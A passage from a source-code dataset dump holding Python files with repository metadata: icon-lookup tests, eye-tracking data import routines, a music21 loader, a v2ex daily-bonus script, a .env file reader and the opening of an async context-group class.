| 83
| 79
| 40.289157
| 0.721393
| 0.32805
| 0
| 0
| 0
| 0
| 0.060027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.093023
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888c285859f9179b927cbdc06da726b52d44b5cf
| 3,731
|
py
|
Python
|
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | 1
|
2021-06-02T11:11:50.000Z
|
2021-06-02T11:11:50.000Z
|
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | null | null | null |
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from unittest import mock
import pytest
from freedesktop_icons import Icon, Theme, lookup, lookup_fallback, theme_search_dirs
@pytest.mark.parametrize(
("env", "expected"),
(
("", [Path.home() / '.icons']),
("/foo:", [Path.home() / '.icons', Path('/foo/icons')]),
),
)
def test_theme_search_dirs(env, expected, monkeypatch):
monkeypatch.setenv('XDG_DATA_DIRS', env)
assert list(theme_search_dirs()) == expected
def _stub_get_theme(get_theme, **kwargs):
get_theme.side_effect = kwargs.get
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent', 'hicolor']
_stub_get_theme(get_theme, Adwaita=real_theme)
lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_icon(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = []
_stub_get_theme(get_theme, Adwaita=real_theme)
icon = Icon("org.mozilla.firefox")
lookup(icon, "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_in_parent(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent']
real_theme.lookup.return_value = None
parent_theme = mock.create_autospec(Theme, name="parent_theme")
_stub_get_theme(get_theme, Adwaita=real_theme, parent=parent_theme)
lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('parent')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_in_hicolor(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent']
real_theme.lookup.return_value = None
parent_theme = mock.create_autospec(Theme, name="parent_theme")
parent_theme.lookup.return_value = None
hicolor = mock.create_autospec(Theme, name="hicolor")
hicolor.lookup.return_value = mock.MagicMock()
_stub_get_theme(get_theme, Adwaita=real_theme, parent=parent_theme, hicolor=hicolor)
path = lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('parent'), mock.call('hicolor')]
assert path is hicolor.lookup.return_value
@mock.patch("freedesktop_icons.get_theme", autospec=True)
@mock.patch("freedesktop_icons.lookup_fallback", autospec=True)
def test_lookup_in_fallback(lookup_fallback, get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.lookup.return_value = None
hicolor = mock.create_autospec(Theme, name="hicolor")
hicolor.lookup.return_value = None
_stub_get_theme(get_theme, Adwaita=real_theme, hicolor=hicolor)
lookup_fallback.return_value = mock.MagicMock()
path = lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('hicolor')]
assert lookup_fallback.mock_calls == [mock.call('org.mozilla.firefox', ['svg', 'png', 'xpm'])]
assert path is lookup_fallback.return_value
@mock.patch("freedesktop_icons.fallback_paths")
def test_lookup_fallback(fallback_paths, tmpdir):
file = tmpdir / 'org.mozilla.firefox.svg'
file.open('w').close()
fallback_paths.return_value = [tmpdir]
assert lookup_fallback("not-there", ['svg']) is None
assert lookup_fallback("org.mozilla.firefox", ['png']) is None
assert lookup_fallback("org.mozilla.firefox", ['svg']) == file
| 35.198113
| 100
| 0.729027
| 498
| 3,731
| 5.184739
| 0.13253
| 0.086754
| 0.054222
| 0.08017
| 0.705655
| 0.662665
| 0.634005
| 0.634005
| 0.543377
| 0.543377
| 0
| 0
| 0.1316
| 3,731
| 105
| 101
| 35.533333
| 0.796914
| 0
| 0
| 0.364865
| 0
| 0
| 0.1777
| 0.05977
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.108108
| false
| 0
| 0.054054
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8890ba16069cecd8d4ab8ea601bde0d4759bc1b2
| 15,223
|
py
|
Python
|
code/functions/et_import.py
|
behinger/etcomp
|
f30389da49c3416c7a723d44951d197d6e89d40e
|
[
"MIT"
] | 20
|
2018-08-08T07:08:46.000Z
|
2022-03-07T14:49:06.000Z
|
code/functions/et_import.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 32
|
2017-12-05T14:05:48.000Z
|
2020-10-20T10:29:43.000Z
|
code/functions/et_import.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 7
|
2018-12-09T22:53:10.000Z
|
2021-11-10T09:13:04.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import os
import logging
from functions.et_helper import findFile,gaze_to_pandas
import functions.et_parse as parse
import functions.et_make_df as make_df
import functions.et_helper as helper
import imp # for edfread reload
import scipy
import scipy.stats
#%% PUPILLABS
def pl_fix_timelag(pl):
#fixes the pupillabs latency lag (which can be super large!!)
t_cam = np.asarray([p['recent_frame_timestamp'] for p in pl['notifications'] if p['subject']=='trigger'])# camera time
t_msg = np.asarray([p['timestamp'] for p in pl['notifications'] if p['subject']=='trigger']) # msg time
#slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(t_msg,t_cam) # predict camera time based on msg time
slope,intercept,low,high = scipy.stats.theilslopes(t_cam,t_msg)
logger = logging.getLogger(__name__)
logger.warning("fixing lag (at t=0) of :%.2fms, slope of %.7f (in a perfect world this is 0ms & 1.0)"%(intercept*1000,slope))
# fill it back in
    # gonna do it with a for-loop because other stuff is too voodoo or not readable for me
# Use this code (and change t_cam and t_msg above) if you want everything in computer time timestamps
#for ix,m in enumerate(pl['gaze_positions']):
# pl['gaze_positions'][ix]['timestamp'] = pl['gaze_positions'][ix]['timestamp'] * slope + intercept
# for ix2,m2 in enumerate(pl['gaze_positions'][ix]['pupil_positions']):
# pl['gaze_positions'][ix]['pupil_positions']['timestamp'] = pl['gaze_positions'][ix]['pupil_positions']['timestamp'] * slope + intercept
#for ix,m in enumerate(pl['gaze_positions']):
# pl['pupil_positions'][ix]['timestamp'] = pl['pupil_positions'][ix]['timestamp'] * slope + intercept# + 0.045 # the 45ms are the pupillabs defined delay between camera image & timestamp3
    # this code maps the notifications into the sample time base
for ix,m in enumerate(pl['notifications']):
pl['notifications'][ix]['timestamp'] = pl['notifications'][ix]['timestamp'] * slope + intercept + 0.045 # the 45ms are the pupillabs defined delay between camera image & timestamp3
return(pl)
def raw_pl_data(subject='',datapath='/net/store/nbp/projects/etcomp/',postfix='raw'):
# Input: subjectname, datapath
# Output: Returns pupillabs dictionary
from lib.pupil.pupil_src.shared_modules import file_methods as pl_file_methods
if subject == '':
filename = datapath
else:
filename = os.path.join(datapath,subject,postfix)
print(os.path.join(filename,'pupil_data'))
# with dict_keys(['notifications', 'pupil_positions', 'gaze_positions'])
# where each value is a list that contains a dictionary
original_pldata = pl_file_methods.load_object(os.path.join(filename,'pupil_data'))
#original_pldata = pl_file_methods.Incremental_Legacy_Pupil_Data_Loader(os.path.join(filename,'pupil_data'))
# 'notification'
# dict_keys(['record', 'subject', 'timestamp', 'label', 'duration'])
# 'pupil_positions'
# dict_keys(['diameter', 'confidence', 'method', 'norm_pos', 'timestamp', 'id', 'topic', 'ellipse'])
# 'gaze_positions'
# dict_keys(['base_data', 'timestamp', 'topic', 'confidence', 'norm_pos'])
# where 'base_data' has a dict within a list
# dict_keys(['diameter', 'confidence', 'method', 'norm_pos', 'timestamp', 'id', 'topic', 'ellipse'])
# where 'normpos' is a list (with horizon. and vert. component)
# Fix the (possible) timelag of pupillabs camera vs. computer time
return original_pldata
def import_pl(subject='', datapath='/net/store/nbp/projects/etcomp/', recalib=True, surfaceMap=True,parsemsg=True,fixTimeLag=True,px2deg=True,pupildetect=None,
pupildetect_options=None):
# Input: subject: (str) name
# datapath: (str) location where data is stored
# surfaceMap:
    # Output: Returns 3 dfs (plsamples, plmsgs, plevents)
# get a logger
logger = logging.getLogger(__name__)
if pupildetect:
# has to be imported first
import av
import ctypes
ctypes.cdll.LoadLibrary('/net/store/nbp/users/behinger/projects/etcomp/local/build/build_ceres_working/lib/libceres.so.2')
if surfaceMap:
# has to be imported before nbp recalib
try:
import functions.pl_surface as pl_surface
except ImportError:
            raise ImportError('Custom Error: Could not import pl_surface')
assert(type(subject)==str)
# Get samples df
# (is still a dictionary here)
original_pldata = raw_pl_data(subject=subject, datapath=datapath)
if pupildetect is not None: # can be 2d or 3d
from functions.nbp_pupildetect import nbp_pupildetect
if subject == '':
filename = datapath
else:
filename = os.path.join(datapath,subject,'raw')
pupil_positions_0= nbp_pupildetect(detector_type = pupildetect, eye_id = 0,folder=filename,pupildetect_options=pupildetect_options)
pupil_positions_1= nbp_pupildetect(detector_type = pupildetect, eye_id = 1,folder=filename,pupildetect_options=pupildetect_options)
pupil_positions = pupil_positions_0 + pupil_positions_1
original_pldata['pupil_positions'] = pupil_positions
recalib=True
# recalibrate data
if recalib:
from functions import nbp_recalib
        if pupildetect is not None:
            original_pldata['gaze_positions'] = nbp_recalib.nbp_recalib(original_pldata, calibration_mode=pupildetect)
        else:
            original_pldata['gaze_positions'] = nbp_recalib.nbp_recalib(original_pldata)
# Fix timing
    # Pupillabs cameras have their own timestamps & clock. The msgs are clocked via computer time. Sometimes computer time & camera time drift (~40% of cases).
# We fix this here
if fixTimeLag:
original_pldata = pl_fix_timelag(original_pldata)
if surfaceMap:
folder= os.path.join(datapath,subject,'raw')
tracker = pl_surface.map_surface(folder)
gaze_on_srf = pl_surface.surface_map_data(tracker,original_pldata['gaze_positions'])
logger.warning('Original Data Samples: %s on surface: %s',len(original_pldata['gaze_positions']),len(gaze_on_srf))
original_pldata['gaze_positions'] = gaze_on_srf
# use pupilhelper func to make samples df (confidence, gx, gy, smpl_time, diameter)
pldata = gaze_to_pandas(original_pldata['gaze_positions'])
if surfaceMap:
pldata.gx = pldata.gx*(1920 - 2*(75+18))+(75+18) # minus white border of marker & marker
pldata.gy = pldata.gy*(1080- 2*(75+18))+(75+18)
logger.debug('Mapped Surface to ScreenSize 1920 & 1080 (minus markers)')
del tracker
# sort according to smpl_time
pldata.sort_values('smpl_time',inplace=True)
# get the nice samples df
plsamples = make_df.make_samples_df(pldata,px2deg=px2deg) #
if parsemsg:
# Get msgs df
# make a list of gridnotes that contain all notifications of original_pldata if they contain 'label'
gridnotes = [note for note in original_pldata['notifications'] if 'label' in note.keys()]
        plmsgs = pd.DataFrame()
for note in gridnotes:
msg = parse.parse_message(note)
if not msg.empty:
plmsgs = plmsgs.append(msg, ignore_index=True)
plmsgs = fix_smallgrid_parser(plmsgs)
else:
plmsgs = original_pldata['notifications']
plevents = pd.DataFrame()
return plsamples, plmsgs,plevents
#%% EYELINK
def raw_el_data(subject, datapath='/net/store/nbp/projects/etcomp/'):
# Input: subjectname, datapath
    # Output: Returns EyeLink dataframes (elsamples, elevents, elnotes)
filename = os.path.join(datapath,subject,'raw')
from pyedfread import edf # parses SR research EDF data files into pandas df
elsamples, elevents, elnotes = edf.pread(os.path.join(filename,findFile(filename,'.EDF')[0]), trial_marker=b'')
return (elsamples,elevents,elnotes)
def import_el(subject, datapath='/net/store/nbp/projects/etcomp/'):
# Input: subject: (str) name
# datapath: (str) location where data is stored
# Output: Returns list of 3 el df (elsamples, elmsgs, elevents)
assert(type(subject)==str)
# get a logger
logger = logging.getLogger(__name__)
# Load edf
# load and preprocess data from raw data files
# elsamples: contains individual EL samples
# elevents: contains fixation and saccade definitions
# elnotes: contains notes (meta data) associated with each trial
elsamples,elevents,elnotes = raw_el_data(subject,datapath)
# TODO understand and fix this
count = 0
while np.any(elsamples.time>1e10) and count < 40:
from pyedfread import edf # parses SR research EDF data files into pandas df
imp.reload(edf)
count = count + 1
# logger.error(elsamples.time[elsamples.time>1e10])
        logger.error('Attention: found sampling times above 1e10. Clearly wrong! Trying again (check again later)')
elsamples, elevents, elnotes = raw_el_data(subject,datapath)
# We also delete Samples with interpolated pupil responses. In one dataset these were ~800samples.
logger.warning('Deleting %.4f%% due to interpolated pupil (online during eyelink recording)'%(100*np.mean(elsamples.errors ==8)))
logger.warning('Deleting %.4f%% due to other errors in the import process'%(100*np.mean((elsamples.errors !=8) & (elsamples.errors!=0))))
elsamples = elsamples.loc[elsamples.errors == 0]
# We had issues with samples with negative time
logger.warning('Deleting %.4f%% samples due to time<=0'%(100*np.mean(elsamples.time<=0)))
elsamples = elsamples.loc[elsamples.time > 0]
# Also at the end of the recording, we had time samples that were smaller than the first sample.
# Note that this assumes the samples are correctly ordered and the last samples actually
# refer to artefacts. If you use %SYNCTIME% this might be problematic (don't know how nwilming's edfread incorporates synctime)
logger.warning('Deleting %.4f%% samples due to time being less than the starting time'%(100*np.mean(elsamples.time <= elsamples.time[0])))
elsamples = elsamples.loc[elsamples.time > elsamples.time[0]]
elsamples = elsamples.reset_index()
# Convert to same units
# change to seconds to be the same as pupil
elsamples['smpl_time'] = elsamples['time'] / 1000
elnotes['msg_time'] = elnotes['trialid_time'] / 1000
elnotes = elnotes.drop('trialid_time',axis=1)
elevents['start'] = elevents['start'] / 1000
elevents['end'] = elevents['end'] / 1000
# TODO solve this!
if np.any(elsamples.smpl_time>1e10):
logger.error(elsamples.smpl_time[elsamples.smpl_time>1e10])
        logger.error('Error: even after reloading the data once, found sampling times above 1e10. This is clearly wrong. Investigate')
        raise Exception('Error: even after reloading the data once, found sampling times above 1e10. This is clearly wrong. Investigate')
# for horizontal gaze component
# Idea: Logical indexing
ix_left = elsamples.gx_left != -32768
ix_right = elsamples.gx_right != -32768
# take the pupil area pa of the recorded eye
# set pa to NaN instead of 0 or -32768
elsamples.loc[elsamples['pa_right'] < 1e-20,'pa_right'] = np.nan
elsamples.loc[~ix_right,'pa_right'] = np.nan
elsamples.loc[elsamples['pa_left'] < 1e-20,'pa_left'] = np.nan
elsamples.loc[~ix_left,'pa_left'] = np.nan
# add pa column that takes the value that is not NaN
ix_left = ~np.isnan(elsamples.pa_left)
ix_right = ~np.isnan(elsamples.pa_right)
# init with nan
elsamples['pa'] = np.nan
elsamples.loc[ix_left, 'pa'] = elsamples.pa_left[ix_left]
elsamples.loc[ix_right,'pa'] = elsamples.pa_right[ix_right]
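    # Worked example (illustrative, not in the original file): in a
    # left-eye-only recording, gx_right stays at the EyeLink missing-value
    # sentinel -32768, so ix_right is all False and 'pa' (and below 'gx',
    # 'gy') are filled entirely from the *_left columns.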
# Determine which eye was recorded
ix_left = elsamples.gx_left != -32768
ix_right = elsamples.gx_right != -32768
if (np.mean(ix_left | ix_right)<0.99):
        raise NameError('More than 1% of samples have neither left nor right eye data')
# for horizontal gaze component
elsamples.loc[ix_left,'gx'] = elsamples.gx_left[ix_left]
elsamples.loc[ix_right,'gx'] = elsamples.gx_right[ix_right]
# for horizontal gaze velocity component
elsamples.loc[ix_left,'gx_vel'] = elsamples.gxvel_left[ix_left]
elsamples.loc[ix_right,'gx_vel'] = elsamples.gxvel_right[ix_right]
# for vertical gaze component
ix_left = elsamples.gy_left != -32768
ix_right = elsamples.gy_right != -32768
elsamples.loc[ix_left,'gy'] = elsamples.gy_left[ix_left]
elsamples.loc[ix_right,'gy'] = elsamples.gy_right[ix_right]
# for vertical gaze velocity component
elsamples.loc[ix_left,'gy_vel'] = elsamples.gyvel_left[ix_left]
elsamples.loc[ix_right,'gy_vel'] = elsamples.gyvel_right[ix_right]
# Make (0,0) the point bottom left
elsamples['gy'] = 1080 - elsamples['gy']
# "select" relevant columns
elsamples = make_df.make_samples_df(elsamples)
# Parse EL msg
elmsgs = elnotes.apply(parse.parse_message,axis=1)
elmsgs = elmsgs.drop(elmsgs.index[elmsgs.isnull().all(1)])
elmsgs = fix_smallgrid_parser(elmsgs)
return elsamples, elmsgs, elevents
def fix_smallgrid_parser(etmsgs):
    # This fixes the missing separation between "small grid before" and "small grid after": during the experiment both were sent with identical names.
replaceGrid = pd.Series([k for l in [13*['SMALLGRID_BEFORE'],13*['SMALLGRID_AFTER']]*6 for k in l])
ix = etmsgs.query('grid_size==13').index
    if len(ix) != 156:
raise RuntimeError('we need to have 156 small grid msgs')
replaceGrid.index = ix
etmsgs.loc[ix,'condition'] = replaceGrid
    # this fixes that all button presses, stop messages etc. were sent as GRID and not SMALLGRID
for blockid in etmsgs.block.dropna().unique():
if blockid == 0:
continue
tmp = etmsgs.query('block==@blockid')
t_before_start = tmp.query('condition=="DILATION"& exp_event=="stop"').msg_time.values
t_before_end = tmp.query('condition=="SHAKE" & exp_event=="stop"').msg_time.values
t_after_start = tmp.query('condition=="SHAKE" & exp_event=="stop"').msg_time.values
t_after_end =tmp.iloc[-1].msg_time
ix = tmp.query('condition=="GRID"&msg_time>@t_before_start & msg_time<=@t_before_end').index
etmsgs.loc[ix,'condition'] = 'SMALLGRID_BEFORE'
ix = tmp.query('condition=="GRID"&msg_time>@t_after_start & msg_time<=@t_after_end').index
etmsgs.loc[ix,'condition'] = 'SMALLGRID_AFTER'
return(etmsgs)
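# --- Illustrative sketch (not part of the original file) ---
# A self-contained toy version of the robust clock fit in pl_fix_timelag,
# on synthetic timestamps (the offset and slope are ours for illustration):
if __name__ == '__main__':
    t_msg = np.linspace(0.0, 10.0, 50)
    t_cam = 1.0000005 * t_msg + 0.040  # ~40 ms offset, near-unit slope
    slope, intercept, low, high = scipy.stats.theilslopes(t_cam, t_msg)
    print('lag %.1fms, slope %.7f' % (intercept * 1000, slope))  # ~40.0ms, ~1.0000005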
| 42.522346
| 200
| 0.670564
| 2,017
| 15,223
| 4.920178
| 0.241943
| 0.025393
| 0.016929
| 0.016324
| 0.371927
| 0.329303
| 0.280431
| 0.207477
| 0.135228
| 0.128376
| 0
| 0.018603
| 0.219602
| 15,223
| 358
| 201
| 42.522346
| 0.816751
| 0.312488
| 0
| 0.157895
| 0
| 0.023392
| 0.183931
| 0.037712
| 0
| 0
| 0
| 0.002793
| 0.011696
| 1
| 0.035088
| false
| 0
| 0.140351
| 0
| 0.19883
| 0.005848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889138e8c38a61134d0f1c1dd8b79dfd0eb55e28
| 768
|
py
|
Python
|
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | 4
|
2021-09-24T13:44:22.000Z
|
2022-03-23T14:03:51.000Z
|
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | null | null | null |
EXPERIMENT_5/loader.py
|
PRamoneda/RL_PianoFingering
|
d9a42c3cb0777c54c1b3e2355128479ef97e8e63
|
[
"MIT"
] | 2
|
2022-02-14T10:01:10.000Z
|
2022-03-31T15:40:06.000Z
|
import music21
KEY_TO_SEMITONE = {'c': 0, 'c#': 1, 'db': 1, 'd': 2, 'd#': 3, 'eb': 3, 'e': 4,
'f': 5, 'f#': 6, 'gb': 6, 'g': 7, 'g#': 8, 'ab': 8, 'a': 9,
'a#': 10, 'bb': 10, 'b': 11, 'x': None}
def parse_note(note):
n = KEY_TO_SEMITONE[note[:-1].lower()]
octave = int(note[-1]) + 1
return octave * 12 + n - 21
translate5 = {
46: 0,
48: 1,
50: 2,
51: 3,
53: 4,
55: 5,
56: 6,
58: 7,
}
def load_test5(times=1):
sc = music21.converter.parse('test5.musicxml')
rh = [translate5[parse_note(str(n.pitch).lower())] for n in sc.parts[0].flat.getElementsByClass('Note')]
pieces = []
for _ in range(times):
pieces.append(rh)
return pieces
# print(load_test5())
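# --- Illustrative check (not part of the original file) ---
# Worked arithmetic for parse_note: 'a4' -> semitone 9, octave int('4')+1 = 5,
# so 5*12 + 9 - 21 = 48, which translate5 maps to scale index 1.
assert parse_note('a4') == 48
assert translate5[parse_note('a4')] == 1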
| 21.333333
| 108
| 0.492188
| 120
| 768
| 3.075
| 0.566667
| 0.0271
| 0.070461
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113346
| 0.28776
| 768
| 36
| 109
| 21.333333
| 0.561243
| 0.02474
| 0
| 0
| 0
| 0
| 0.061497
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88940ecc81bb7244f9aadc5c0b28b58ae24e3599
| 1,698
|
py
|
Python
|
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
v2ex_daily.py
|
ZHLHZHU/v2ex
|
b8458b6834eb22fe337146251f2f1bcd2ecb1a92
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import http.cookiejar
import urllib.request
# your v2ex cookie value for the key [auth] after login
# refer to README.md if you cannot find the [auth] cookie
V2EX_COOKIE = ''
V2EX_DOMAIN = r'v2ex.com'
V2EX_URL_START = r'https://' + V2EX_DOMAIN
V2EX_MISSION = V2EX_URL_START + r'/mission/daily'
V2EX_COIN_URL = r'/mission/daily/redeem?once='
def get_once_url(data):
    p = r'/mission/daily/redeem\?once=\d+'
m = re.search(p, data.decode())
if m:
return m.group()
else:
return None
def make_cookie(name, value):
return http.cookiejar.Cookie(
version=0,
name=name,
value=value,
port=None,
port_specified=False,
domain=V2EX_DOMAIN,
domain_specified=True,
domain_initial_dot=False,
path='/',
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest=None
)
if __name__ == '__main__':
cj = http.cookiejar.CookieJar()
cj.set_cookie(make_cookie('auth', V2EX_COOKIE))
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
opener.addheaders = [
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0'),
('Referer', V2EX_MISSION)
]
opener.open(V2EX_URL_START).read()
data = opener.open(V2EX_MISSION).read()
once = get_once_url(data)
if not once:
print('"once" not found, maybe you already got coins')
sys.exit(-1)
v2ex_coin_url = V2EX_URL_START + once
print(v2ex_coin_url)
opener.open(v2ex_coin_url).read()
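    # --- Illustrative check (not part of the original file) ---
    # get_once_url scans the page body for the redeem link; a toy input:
    sample = b'<a href="/mission/daily/redeem?once=12345">redeem</a>'
    assert get_once_url(sample) == '/mission/daily/redeem?once=12345'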
| 24.257143
| 92
| 0.636631
| 231
| 1,698
| 4.480519
| 0.4329
| 0.027053
| 0.046377
| 0.038647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030116
| 0.237338
| 1,698
| 69
| 93
| 24.608696
| 0.769112
| 0.080683
| 0
| 0
| 0
| 0.019231
| 0.146435
| 0.037251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0.019231
| 0.173077
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8894291bf420c1eeb84dea70fc3a6ddba70429ed
| 2,309
|
py
|
Python
|
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | null | null | null |
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | 1
|
2017-07-18T20:49:43.000Z
|
2017-07-20T15:14:10.000Z
|
read_env.py
|
sloria/read_env
|
90c5a7b38d70f06cd96b5d9a7e68e422bb5bd605
|
[
"MIT"
] | 1
|
2018-04-11T11:55:55.000Z
|
2018-04-11T11:55:55.000Z
|
# -*- coding: utf-8 -*-
import re
import shlex
import os
import inspect
__version__ = '1.1.0'
try:
FileNotFoundError
except NameError: # Python 2
FileNotFoundError = IOError
ENV = '.env'
def read_env(path=None, environ=None, recurse=True):
"""Reads a .env file into ``environ`` (which defaults to ``os.environ``).
    If .env is not found in the directory from which this function is called, the search
    recurses up the directory tree until a .env file is found.
"""
environ = environ if environ is not None else os.environ
# By default, start search from the same file this function is called
if path is None:
frame = inspect.currentframe().f_back
caller_dir = os.path.dirname(frame.f_code.co_filename)
path = os.path.join(os.path.abspath(caller_dir), ENV)
if recurse:
current = path
pardir = os.path.abspath(os.path.join(current, os.pardir))
while current != pardir:
target = os.path.join(current, ENV)
if os.path.exists(target):
path = os.path.abspath(target)
break
else:
current = os.path.abspath(os.path.join(current, os.pardir))
pardir = os.path.abspath(os.path.join(current, os.pardir))
if not path:
raise FileNotFoundError('Could not find a .env file')
with open(path, 'r') as fp:
content = fp.read()
parsed = parse_env(content)
for key, value in parsed.items():
environ.setdefault(key, value)
_ITEM_RE = re.compile(r'[A-Za-z_][A-Za-z_0-9]*')
# From Honcho. See NOTICE file for license details.
def parse_env(content):
"""Parse the content of a .env file (a line-delimited KEY=value format) into a
dictionary mapping keys to values.
"""
values = {}
for line in content.splitlines():
lexer = shlex.shlex(line, posix=True)
tokens = list(lexer)
# parses the assignment statement
if len(tokens) < 3:
continue
name, op = tokens[:2]
value = ''.join(tokens[2:])
if op != '=':
continue
if not _ITEM_RE.match(name):
continue
value = value.replace(r'\n', '\n')
value = value.replace(r'\t', '\t')
values[name] = value
return values
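# --- Illustrative check (not part of the original file) ---
# parse_env tokenizes each line with shlex in POSIX mode, so quoting and
# trailing '#' comments behave like shell assignments:
if __name__ == '__main__':
    sample = 'API_KEY=abc123\nGREETING="hello world"  # comment\n'
    assert parse_env(sample) == {'API_KEY': 'abc123', 'GREETING': 'hello world'}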
| 30.381579
| 85
| 0.603291
| 314
| 2,309
| 4.378981
| 0.39172
| 0.052364
| 0.036364
| 0.049455
| 0.091636
| 0.091636
| 0.091636
| 0.091636
| 0.091636
| 0.064
| 0
| 0.006024
| 0.281074
| 2,309
| 75
| 86
| 30.786667
| 0.822289
| 0.214379
| 0
| 0.096154
| 0
| 0
| 0.037704
| 0.01238
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.134615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889bb7e2d51608191ee475ae210800ea251a72c4
| 2,535
|
py
|
Python
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 14
|
2020-08-24T18:23:31.000Z
|
2021-11-04T14:11:04.000Z
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 19
|
2020-08-25T15:57:05.000Z
|
2021-07-07T00:49:45.000Z
|
trinity/contextgroup.py
|
g-r-a-n-t/trinity
|
f108b6cd34ed9aabfcf9e235badd91597650ecd5
|
[
"MIT"
] | 7
|
2020-08-24T22:53:02.000Z
|
2022-03-28T18:51:48.000Z
|
import asyncio
import sys
from types import TracebackType
from typing import Any, AsyncContextManager, List, Optional, Sequence, Tuple, Type
from trio import MultiError
from p2p.asyncio_utils import create_task
class AsyncContextGroup:
def __init__(self, context_managers: Sequence[AsyncContextManager[Any]]) -> None:
self.cms = tuple(context_managers)
